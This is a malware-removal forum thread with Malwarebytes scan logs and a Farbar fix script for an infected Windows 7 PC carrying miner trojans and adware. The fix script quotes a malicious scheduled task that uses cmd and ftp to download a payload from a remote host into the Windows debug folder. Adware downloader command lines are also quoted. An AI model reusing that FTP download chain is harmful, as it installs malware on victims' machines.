PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\settings.js, No Action By User, 181, 182117, , , , , 628BB2AF95ABE092B37EB0603E8AF25A, 41086EC92A1DA98E14977CA090463995A909258160A512AD01126E3E2672E271
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\version.txt, No Action By User, 181, 182117, , , , , 20DFA789C2D17F69D7B957A95712B9F0, D6F917C484E6A48FCF8B90EF09CDE0286C3D86E5DEAD48B42FAF0DAE94FB2DF5
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Feeds\http___alerts_conduit-services_com_root_1434483_1430138_US.xml, No Action By User, 181, 182117, , , , , 7EF37BC4AA08639B8D02F020365A4B24, 9A5879BD7F6A9FCE5123DC199280E5AAB87D5E5A715F27C0A2663C0CC4815028
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\LanguagePacks\en.xml, No Action By User, 181, 182117, , , , , CBAEB8C3DF2171B615285809CEADA5DF, E2DE98E52AD1BCF5CE84CD64480A207F63043C9B608A0BBAB82F671AFAC28B46
PUP.Optional.SearchProtect.AppFlsh, C:\Program Files (x86)\SearchProtect\Main\rep\SystemRepository.dat, No Action By User, 1613, 182259, , , , , 9D3CCDD2A0FEEAA39C6F272C39C67281, 6EFBF24DF4D574E7D80441F0320DDF2CA24F6D2024C5D79239E44C55C8FFE344
PUP.Optional.PCKeeper, C:\Users\Marilyn\AppData\Local\Essentware\DefaultDomain_Path_xseuterajdw5fywvmojz5uax4dukfyo4\2.2.2155.0\user.config, No Action By User, 1335, 182318, , , , , C0AE04348F1BC31C3B5407AB4F0B0F46, 623B6A086C77A4D7CA0DBB6C440829137D83C48AC9651F22A339870ED5E6ABB5
RiskWare.BitCoinMiner, C:\WINDOWS\SYSTEM32\TASKS\OKA, No Action By User, 897, 770535, 1.0.49973, , ame, , 528D27594F47668D12967F9306E78740, 298A4C59484D7EFEB63A529A125FC81AE54B06989F5438553ACCB4FB0F05DC8F
PUP.Optional.AppGraffiti, C:\PROGRAM FILES (X86)\APPGRAFFITI\AGUPDATE.EXE, No Action By User, 1008, 235494, , , , , A3CCBBB0735800B89931B73CCB69F9B1, 97D0684AB1ECB2F89A3C8E53DC383AEDE506A1F9367AA283C0B9992A19854D43
Trojan.BitCoinMiner.E, C:\WINDOWS\INF\ASPNET\CONFIG.JSON, No Action By User, 3744, 862122, 1.0.49973, , ame, , A1DBFEE625D809262093BE374C2C1F7D, C8559D6211D8115AD1DDC6A460E6A83BC85C2D52A145CB4363FD1F5FF6BE904A
Trojan.BitCoinMiner.E, C:\Windows\inf\aspnet\lsma22.exe, No Action By User, 3744, 862122, , , , , D6F8C66D27FA8D4172399AFBFBCE6975, BA1E190E87D89FF7943CCA039F357CA8E7C37255D51ACCF49393E2F9119DEC04
Trojan.BitCoinMiner.E, C:\Windows\inf\aspnet\WinRing0x64.sys, No Action By User, 3744, 862122, , , , , 0C0195C48B6B8582FA6F6373032118DA, 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
PUP.Optional.ASK.Generic, C:\Users\lindag\AppData\LocalLow\AskToolbar\APNU\config.xml, No Action By User, 2058, 549226, , , , , 99DAC1A062D811506FD706DD86208258, 1CABD1EC07D6DC7E18AFEED87C2554A508D2A6BF4164A967767DFC11C137DDC6
Trojan.Agent.WmiBit, C:\WINDOWS\SYSTEM32\TASKS\MYSA1, No Action By User, 5648, 430785, , , , , 58F5CDEAC904D93FB1E6BA20122A6EE1, 685F20DA1CF791030AE003881C76604317AA4F4051790FE53C8CFB9E44DF056E
Trojan.Agent.WmiBit, C:\WINDOWS\SYSTEM32\TASKS\MYSA2, No Action By User, 5648, 430785, , , , , 6C180179C320EEE1B3BF0DD81ACDD110, E7EF12D7EE2DF93B0E6FC553940AD34A677ED4EBC3BE58C273700EB97E211DE4
Trojan.Agent.Generic, C:\WINDOWS\SYSTEM32\TASKS\OK, No Action By User, 3671, 417162, , , , , B98D7DE5D80FEBB88495596517132962, 03F970C1B748914CD882FF1B0A35D7104F005539A0DA71A3A42C809A63CF6BF8
Malware.AI.99273125, C:\USERS\MARILYN\APPDATA\ROAMING\SHOPATHOME\SHOPATHOMETOOLBAR\IE8GUARDWORKAROUND.EXE, No Action By User, 1000000, 0, 1.0.49973, BC353AB0F0B2101305EAC9A5, dds, 01603864, CB24494EBF47138E084B59045543BD74, 5E7EC1657F51B8A600E20CB1C39AFF523AFFFCF0BA1A8136B6B33402431EDFD3
Malware.AI.935949801, C:\USERS\MARILYN\APPDATA\ROAMING\SHOPATHOME\SHOPATHOMETOOLBAR\UNINSTALL.EXE, No Action By User, 1000000, 0, 1.0.49973, 6FFE00526D9A002237C975E9, dds, 01603864, DCF3BD052A58DDC95C05097EDF84C786, DC0EB59B5FE99E8A6FC242E39EA4E821AE5E42BFF5813068730BA3AC6AF75E14
Malware.AI.1177501665, C:\USERS\MARILYN\APPDATA\ROAMING\SHOPATHOME\SHOPATHOMETOOLBAR\TBHELPER2.EXE, No Action By User, 1000000, 0, 1.0.49973, 74B324EF98AE1A61462F3FE1, dds, 01603864, 8BEBC72C54161968EC762CEE7426913A, 42707735C1A1ADBC4FAFBACE05966E52F591E839C6BE92F04431120D0B3B8197
Trojan.MalPack.UPX, C:\WINDOWS\TEMP\CONHOY.EXE, No Action By User, 7216, 858908, 1.0.49973, EF5058CCC8725A5C802E0BD8, dds, 01603864, A4FDD182C052C420520377E94442376D, 8B7963CB577113F618ED39F5D2F13BBDC34A5000B454B3FEA6082F0C828EE683
PUP.Optional.ASK, C:\USERS\LINDAG\APPDATA\LOCAL\TEMP\{86D4B82A-ABED-442A-BE86-96357B70F4FE}\RUNIE.EXE, No Action By User, 268, 935438, 1.0.49973, , ame, , 88E3225D42EB43D99A519080E039FEE4, EEAE4C4DCEA166F8A1B5D93EC2EDA0A766467DD62FB95F62DCB622AF5CE38608
PUP.Optional.ASK, C:\USERS\LINDAG\APPDATA\LOCAL\TEMP\{86D4B82A-ABED-442A-BE86-96357B70F4FE}\ASKPARTNERCOBRANDINGTOOL.EXE, No Action By User, 268, 935438, 1.0.49973, , ame, , 508E1B08B14249ECB1E05CDD0B0F98AE, EB4F219FE0894D8DA61C3B3521FC27633A361AF41708A687ED54DA48EA67E315
 
Physical Sector: 0
(No malicious items detected)
 
WMI: 3
Hijack.Script.WMI, \\MARILYN-HP\ROOT\subscription:__FilterToConsumerBinding.Consumer="CommandLineEventConsumer.Name=\"killmm4\"",Filter="__EventFilter.Name=\"killmm3\"", No Action By User, 15592, 868677, , , , , , 
Hijack.Script.WMI, \\MARILYN-HP\ROOT\subscription:__EventFilter.Name="killmm3", No Action By User, 15592, 868677, , , , , , 
Hijack.Script.WMI, \\MARILYN-HP\ROOT\subscription:CommandLineEventConsumer.Name="killmm4", No Action By User, 15592, 868677, 1.0.49973, , ame, , , 
 
 
(end)
 
As soon as I booted normally MBAM disappeared again and conhoy.exe reappeared in C:\Windows\temp so the Bitcoin miner infection is still active as well as whatever is killinh MBAM.

Edited by Ztruker, 28 March 2022 - 12:23 PM.

Rich
 

Die with memories, not dreams. – Unknown


#8 Ztruker

Ztruker

    WTT Technical Elder

  • Tech Team
  • 8,292 posts
  • Interests:Helping people fix MS Windows related computer problems of all kinds.

    Waking each morning to see the green side of the Earth!

Posted 28 March 2022 - 02:42 PM

I re-ran MBAM again after reinstalling in Safe mode.

 

Malwarebytes
www.malwarebytes.com

-Log Details-
Scan Date: 3/28/22
Scan Time: 4:09 PM
Log File: 06c014dc-aed3-11ec-b27d-60eb6909b7df.json

-Software Information-
Version: 4.5.2.157
Components Version: 1.0.1562
Update Package Version: 1.0.52968
License: Trial

-System Information-
OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Marilyn-HP\Administrator

-Scan Summary-
Scan Type: Threat Scan
Scan Initiated By: Manual
Result: Completed
Objects Scanned: 378687
Threats Detected: 26
Threats Quarantined: 0
Time Elapsed: 17 min, 13 sec

-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect

-Scan Details-
Process: 0
(No malicious items detected)

Module: 0
(No malicious items detected)

Registry Key: 12
RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{78C18B8F-D438-4E67-AA86-B8871F36DA38}, No Action By User, 896, 770537, 1.0.52968, , ame, , ,
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{4B7A0CF9-2058-452B-8E92-58880184B886}, No Action By User, 5602, 430785, , , , , ,
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{4B7A0CF9-2058-452B-8E92-58880184B886}, No Action By User, 5602, 430785, , , , , ,
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa1, No Action By User, 5602, 430785, 1.0.52968, , ame, , ,
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{089ADF8F-0201-4E63-8921-F7294016BB3C}, No Action By User, 5602, 430785, , , , , ,
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\BOOT\{089ADF8F-0201-4E63-8921-F7294016BB3C}, No Action By User, 5602, 430785, , , , , ,
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa2, No Action By User, 5602, 430785, 1.0.52968, , ame, , ,
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{9DAC6128-DCF1-4FE5-8EB6-A19365D91B95}, No Action By User, 3644, 417162, , , , , ,
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{9DAC6128-DCF1-4FE5-8EB6-A19365D91B95}, No Action By User, 3644, 417162, , , , , ,
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\ok, No Action By User, 3644, 417162, 1.0.52968, , ame, , ,
RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{78C18B8F-D438-4E67-AA86-B8871F36DA38}, No Action By User, 896, 770539, , , , , ,
RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\oka, No Action By User, 896, 770539, 1.0.52968, , ame, , ,


Registry Value: 1
RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{78C18B8F-D438-4E67-AA86-B8871F36DA38}|PATH, No Action By User, 896, 770537, 1.0.52968, , ame, , ,

Registry Data: 0
(No malicious items detected)

Data Stream: 0
(No malicious items detected)

Folder: 1
Trojan.BitCoinMiner.E, C:\WINDOWS\INF\ASPNET, No Action By User, 3714, 862122, 1.0.52968, , ame, , ,

File: 9
Backdoor.ForShare.WmiBit, C:\WINDOWS\DEBUG\ITEM.DAT, No Action By User, 5821, 430781, 1.0.52968, 2B1C66581342EDE26011C68B, dds, 01703104, BDFA523E5A06C417E30F0DAECB6215F3, 1E8441F0D32D3854E0B3801063F6015A9F09637D77B714F8E58FB8C198693A51
Trojan.Agent.WmiBit, C:\WINDOWS\SYSTEM32\TASKS\MYSA1, No Action By User, 5602, 430785, , , , , 5BD531A443A8A4E8C5195982D0BDAD1D, 955792D4C74AD877E77D1C37F530970670975534C69463C60CC8E7610258D036
Trojan.BitCoinMiner.E, C:\WINDOWS\INF\ASPNET\CONFIG.JSON, No Action By User, 3714, 862122, 1.0.52968, , ame, , A1DBFEE625D809262093BE374C2C1F7D, C8559D6211D8115AD1DDC6A460E6A83BC85C2D52A145CB4363FD1F5FF6BE904A
Trojan.BitCoinMiner.E, C:\Windows\inf\aspnet\lsma22.exe, No Action By User, 3714, 862122, , , , , D6F8C66D27FA8D4172399AFBFBCE6975, BA1E190E87D89FF7943CCA039F357CA8E7C37255D51ACCF49393E2F9119DEC04
Trojan.BitCoinMiner.E, C:\Windows\inf\aspnet\WinRing0x64.sys, No Action By User, 3714, 862122, , , , , 0C0195C48B6B8582FA6F6373032118DA, 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
Trojan.Agent.WmiBit, C:\WINDOWS\SYSTEM32\TASKS\MYSA2, No Action By User, 5602, 430785, , , , , 2D54BC2232A14A67ADF62CAFA00AC8E8, 8B93DA16D608769B6366A3581A1D5975A764D8BCE6BBE8000525B7F5E5211044
Trojan.Agent.Generic, C:\WINDOWS\SYSTEM32\TASKS\OK, No Action By User, 3644, 417162, , , , , 69DE95BA252EC539D68C7AD4A329D8C5, CE20AE4258E6644979C18BCAB0DBEF4955D5E916F507093AD076DDF29E44DA5F
RiskWare.BitCoinMiner, C:\WINDOWS\SYSTEM32\TASKS\OKA, No Action By User, 896, 770539, , , , , B8A9EBCD68C44B1155754ED02CA84360, 2094EB9B04667AB50B38198CD751EE1C4D1A76CB9EBDE81C7129359799962DCA
Trojan.MalPack.UPX, C:\WINDOWS\TEMP\CONHOY.EXE, No Action By User, 7156, 858908, 1.0.52968, EF5058CCC8725A5C802E0BD8, dds, 01703104, A4FDD182C052C420520377E94442376D, 8B7963CB577113F618ED39F5D2F13BBDC34A5000B454B3FEA6082F0C828EE683


Physical Sector: 0
(No malicious items detected)

WMI: 3
Hijack.Script.WMI, \\MARILYN-HP\ROOT\subscription:__FilterToConsumerBinding.Consumer="CommandLineEventConsumer.Name=\"killmm4\"",Filter="__EventFilter.Name=\"killmm3\"", No Action By User, 15642, 868677, , , , , ,
Hijack.Script.WMI, \\MARILYN-HP\ROOT\subscription:__EventFilter.Name="killmm3", No Action By User, 15642, 868677, , , , , ,
Hijack.Script.WMI, \\MARILYN-HP\ROOT\subscription:CommandLineEventConsumer.Name="killmm4", No Action By User, 15642, 868677, 1.0.52968, , ame, , ,



(end)


Edited by Ztruker, 28 March 2022 - 04:14 PM.

Rich
 

Die with memories, not dreams. – Unknown


#9 Juliet

Juliet

    SuperHelper

  • Retired Classroom Teacher
  • 7,686 posts
  • Interests:Boo!....
  • MVP

Posted 28 March 2022 - 04:55 PM

Dang,  theres a lot going on here,  and this machine appears to had no maintenance in quite some time.
 
Did you allow MalwareBytes to delete all that was found?
 
We will probably run it again after you do the script I've created.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Please go to one of the below sites to scan the following files:
Virus Total (Recommended)
jotti.org
VirScan
click on Browse, and upload the following file for analysis:

C:\Windows\inf\aspnet\lsma22.exe


Then click Submit. Allow the file to be scanned, and then please copy and paste the results link (for Virus Total) here for me to see.
If it says already scanned -- click "reanalyze now"
Please post the results in your next reply.

Also please have this file checked
c:\windows\inf\aspnet\lsma22.exe
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~`
 The below items need to be removed from Programs list in the control panel.
PCKeeper
Ask Toolbar Updater

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Start Farbar Recovery Scan Tool with Administrator privileges
(Right click on the FRST icon and select Run as administrator, just open it and let it wait)

highlight on the text below inside the quote box and select Copy.
beginning with Start:: and finishing with End::
 

Start::
CloseProcesses:
CreateRestorePoint:
C:\Windows\Temp\conhoy.exe
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [PCKeeperLive] => "C:\Program Files\Essentware\PCKeeper\PCKeeper.exe" /autorun (No File)
C:\Program Files\Essentware\PCKeeper\PCKeeper.exe
C:\Program Files\Essentware\PCKeeper
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [KGShareApp] => C:\Program Files (x86)\Kodak\KODAK Share Button App\KGShare_App.exe (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [HP Deskjet 3050A J611 series (NET)] => "C:\Program Files\HP\HP Deskjet 3050A J611 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN18A481V305PJ:NW" -scfn "HP Deskjet 3050A J611 series (NET)" -AutoStart 1 (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [HP Deskjet 3050A J611 series (NET) #2] => "C:\Program Files\HP\HP Deskjet 3050A J611 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN28P6FM2905PJ:NW" -scfn "HP Deskjet 3050A J611 series (NET) #2" -AutoStart 1 (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\Run: [PCKeeperLive] => "C:\Program Files\Essentware\PCKeeper\PCKeeper.exe" /autorun (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\Run: [swg] => "C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\Run: [KGShareApp] => C:\Program Files (x86)\Kodak\KODAK Share Button App\KGShare_App.exe (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\Run: [HP Deskjet 3050A J611 series (NET)] => "C:\Program Files\HP\HP Deskjet 3050A J611 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN18A481V305PJ:NW" -scfn "HP Deskjet 3050A J611 series (NET)" -AutoStart 1 (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\Run: [HP Deskjet 3050A J611 series (NET) #2] => "C:\Program Files\HP\HP Deskjet 3050A J611 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN28P6FM2905PJ:NW" -scfn "HP Deskjet 3050A J611 series (NET) #2" -AutoStart 1 (No File)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
IFEO\uihost32.exe: [Debugger] ntsd -d
IFEO\uihost64.exe: [Debugger] ntsd -d
IFEO\vid001.exe: [Debugger] ntsd -d
Task: {0755F16F-16EE-419E-B0E7-0CC9CA968B96} - System32\Tasks\Information-codedownloader => C:\Program Files (x86)\Information\Information-codedownloader.exe /reinstallapp /runfrom=task /agentregpath='Information' /appid=50368 /srcid='000972' /subid='verticals-shopping,intext,pops,ads,' /zdata='0' /bic=07DDEFF8A66544268EF5CBBA1DF83E80IE /verifier=2b16ecc477d558dd9a11ec235ae5ad0f /installerversion=1_34_2_13 /installerfullversion=1.34.2.13 /installationtime=1395509351 /statsdomain=http://stats.srvstat...rvstatsdata.com/codedownloaddomain=http://app-static.crossrider.com /defbro=ie /allusers /autoupdateulr='http://update.srvstatsdata.com/ie_code_agent_updates/{CAMP_ID}/update.json' /runfrom='task' /externallog='' (No File) <==== ATTENTION
Task: {0D23653C-6BD6-4C2E-9B7B-7CDE28991827} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe /PBDADiscovery (No File)
Task: {130F0ABF-F04E-403D-9072-46195AC3C09E} - System32\Tasks\HP AR Program Upload - 5c0f950a1bac498fa00becd99f6716457d4ebca62a29425ca9ed17aa3deb9a58 => C:\Program Files\HP\HP ENVY 7640 series\bin\HPRewards.exe -N 5c0f950a1bac498fa00becd99f6716457d4ebca62a29425ca9ed17aa3deb9a58 -mode Scheduled (No File)
Task: {13E5D543-D30F-47EB-B157-AA513D0E504D} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe /OCURDiscovery $(Arg0) (No File)
Task: {25C3FE4E-7C48-447D-BAC5-141069528E0A} - System32\Tasks\Information-enabler => C:\Program Files (x86)\Information\Information-enabler.exe /enablebho /agentregpath='Information' /appid=50368 /srcid='000972' /subid='verticals-shopping,intext,pops,ads,' /zdata='0' /bic=07DDEFF8A66544268EF5CBBA1DF83E80IE /verifier=2b16ecc477d558dd9a11ec235ae5ad0f /installerversion=1_34_2_13 /installationtime=1395509351 /statsdomain=http://stats.srvstat...rvstatsdata.com/bhoguid=11111111-1111-1111-1111-110511031168 /defbro=ie /allusers /autoupdateulr='http://update.srvstatsdata.com/ie_enable_agent_updates/{CAMP_ID}/update.json' /runfrom='task' /externallog='' (No File) <==== ATTENTION
Task: {283FA5F3-05D9-4E45-8612-CC169745945D} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Total Care Tune-Up => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPTuneUp.exe [17976 2011-03-22] (Hewlett-Packard Company -> Hewlett-Packard Company)
Task: {28AA66E5-16C3-4EC8-9431-3904FE03FF88} - System32\Tasks\Information-chromeinstaller => C:\Program Files (x86)\Information\Information-chromeinstaller.exe /rawdata=CViQRH5mq6RiFfs1dwpjt+9N2qmNgqxn/gMF8uZA8OlW0vDxNi/tGrOocS7rwhXjEBo7yMbWzxrQxWDqNx8w5/JiPTO/sapwqscgUIsbIfPxhUuEnUO9ZJmQe7dlPw4isMUzCZtHUEfVrYB2MlvelKtXYZ0l5q5FtI2b3M2qZhC53dfQ9wgAYWB8aP2aq88oTYpNL35iY62bAyllIZV6UjdFHtcFjFPaHDhvPFM6QXclxCvmVE0nz8qEx2TVJN/UjkC7yF2rKmFjL95z9nxvBJlyLbos5kQPg3j0m/QL+1Dkzi/y/KXCgzozW314M6BM4BO7JeNj1CawWv4c03IACrJSWY0/CNj9A/gPNbviTEKOMk0KDxAuVE0YHrSpMHa9lIUw8gjn+JBRlEhQBrnsGQ0o5KplITgN6R0RmfnwzFLgQUtfPDvmsu3BFtASHo0uN7vr4UDpp8qWZPeqQLhKjwoA2dh5GVjeRkGEy5Yg8iek/3UpjcV+vuStKQGdPMItr1reSR5VcuSa9M6rPq+V1IJIy+hA+6KvdJULojj2//tHFd3FiCL9cfcsmQ6Przgl1zNJxrKBUONR0nf9vhWcXABXsWUeTY0Rz3FzUHhoT8BJeCyzxB4Hm6lVs8mjqSqaSBP6ATeHhDclskM+anK8p+zZGMZj3abu/izdOls6rWA/BvBCG1M772AdTz64rDJmncRWrvEJgsvd3Cnh9GLh2dfXb5/buRX/TZDo2CPOn2Iev3bz2yxaOzShl+Fh4DrHOJY8gwHfj0yTAgsVm3AuXwdC5BYoUrwhgZwQjUohYamPx/vaw0FTbcuUWfRbKGN7sOEUuzb5StkPpjZxWAZaKsDvcjDlWbeA58NklL/w64T30KnH/FqwbACtZe0ye+3jk0FZq1XLXs7H6dwOQiaiMj0sIj9yqTO4k9Wzy7jXeenk4KpjXpv0VbOcaThyNWdRaFnFGdy9YsVASfbi4ab29yDiUmQw2rZbIQweIDbNb6b9kuk/cG3ufu5xkLWZRww7U4VSDHQXYffDKvh5dLrt3xjnVVy+xfrEBHzJNqqlygKIdfV8oeulE840lJEjI0delxR50M8cjz90Lriq845m42EM5C45cHadT7qhMpNLiWNcIwRundiGTTDKFGId+N2IY+nIjk7lQ7uEsQJVzCMTglJmndM3Ie+rsjH+b6dM+36Ed7UloEUsIpBisxo+1CoWAIRhNqOfRXPs//fiRMYLMsHLxtzIOZrQJ4HsN/TFvVcYOBc6AxAmPeB6mFBHZDoSKCAWcRdZ13P8UdoK56FFRPtuTNms9UTCV7QfDulw3/FLprZtXIsE3NQ99fjth4kuDxMnlz9n3afcJ2fNppEKLw== (No File) <==== ATTENTION
Task: {2AE04DAF-5396-4938-9FFA-57DDBA863B88} - System32\Tasks\{8406D554-4EE5-437D-8CEA-C0DA8201F0C9} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Mysearchdial\1.8.29.0\uninstall.exe"
Task: {2B9F2E2D-2321-49DB-8AF7-F55BB2B85E2D} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe /DRMInit (No File)
Task: {2F33CB24-7A24-4BC8-8921-4C26EAB0708F} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-1250379553-2428740185-3603661230-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe /logoncheck (No File)
Task: {319997A5-00B0-4E61-87B9-3CFCEFCFDD29} - System32\Tasks\McAfee\McAfee Idle Detection Task => {ABCDCA3B-DE6B-5A7C-B132-6D7CBA63E5C5} "C:\Program Files\Common Files\McAfee\Platform\McAMTaskAgent.exe" (No File)
Task: {34EA7168-77B4-42AD-86F8-706253868680} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe /DoActivateWindowsSearch (No File)
Task: {3F599EE8-6731-448E-AFDF-D262B64FBE6A} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe /DoRegisterSearch $(Arg0) (No File)
Task: {50705818-630E-4136-BA82-0DB9119DA4AC} - System32\Tasks\Information-firefoxinstaller => C:\Program Files (x86)\Information\Information-firefoxinstaller.exe -> /installxpi /agentregpath='Information' /extensionfilepath='C:\Program Files (x86)\Information\50368.xpi' /appid=50368 /srcid='000972' /subid='verticals-shopping,intext,pops,ads,' /zdata='0' /bic=07DDEFF8A66544268EF5CBBA1DF83E80IE /verifier=2b16ecc477d558dd9a11ec235ae5ad0f /installerversion=1_34_2_13 /installerfullversion=1.34.2.13 /installationtime=1395509351 /statsdomain=http://stats.srvstat...rvstatsdata.com/waitforbrowser=300 /extensionid=ce85a36c-113a-4928-aa86-88a31bd595e7@aa144f8a-c1f6-481f-991c-18bf0472c970.com /extensionversion=0.93 /prefsbranch=ace85a36c113a4928aa8688a31bd595e7aa144f8ac1f6481f991c18bf0472c970com50368 /updateurl=https://w9u6a2p6.ssl.hwcdn.net/plugin/ff/update/50368.rdf /extensionname='Information' /extensiondesc='Information Helper' /publishername='VisualBee' /defbro=ie /allusers /allprofiles /checkfflist /autoupdateulr='http://update.srvstatsdata.com/ff_agent_updates/{CAMP_ID}/update.json' /runfrom='task' /externallog='' <==== ATTENTION
Task: {566C6850-EE65-4F4F-A90B-8795A8D39A5D} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe /wait:90 /PBDADiscovery (No File)
Task: {5A2C50FB-9762-4877-81FD-634A43087C10} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe -PvrSchedule (No File)
Task: {5E809149-E296-4004-924E-26A5B98FB90B} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe -ObjectStoreRecoveryTask (No File)
Task: {68518EFB-4CCB-45A7-91E1-7615E98EB147} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe -pscn 0 (No File)
Task: {6C49D8F6-A561-478F-8562-B5B6C36B3542} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp0810.ru>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {7158081D-DF25-4E71-BC14-844441C6B587} - \MySearchDial -> No File <==== ATTENTION
Task: {7BDAAE08-C707-4305-9740-561B82F7FF91} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe /RestartRecording (No File)
Task: {81D43BF0-31FA-437A-A207-34FBD1EB4443} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe /DoReindexSearchRoot (No File)
Task: {8708676B-C4A6-408D-B706-4030F29488F9} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe /DoUpdateRecordPath $(Arg0) (No File)
Task: {8D941E7F-F453-4838-AF1D-C0D25D4F3262} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe /wait:7 /PBDADiscovery (No File)
Task: {8EE9CB7F-6ABF-497B-80AB-E8EEB72B502C} - System32\Tasks\Information-updater => C:\Program Files (x86)\Information\Information-updater.exe /runupdater /agentregpath='Information' /appid=50368 /srcid='000972' /subid='verticals-shopping,intext,pops,ads,' /zdata='0' /bic=07DDEFF8A66544268EF5CBBA1DF83E80IE /verifier=2b16ecc477d558dd9a11ec235ae5ad0f /installerversion=1_34_2_13 /installationtime=1395509351 /statsdomain=http://stats.srvstat...rvstatsdata.com/geoserviceurl=http://ipgeoapi.com/ /updatejsondomain=http://update.srvstatsdata.com /updaterversion=2 /monetizationdomain=http://stats.mstatsserv.com /autoupdateulr='http://update.srvstatsdata.com/updater_agent_updates/{CAMP_ID}/update.json' /runfrom='task' /externallog='' (No File) <==== ATTENTION
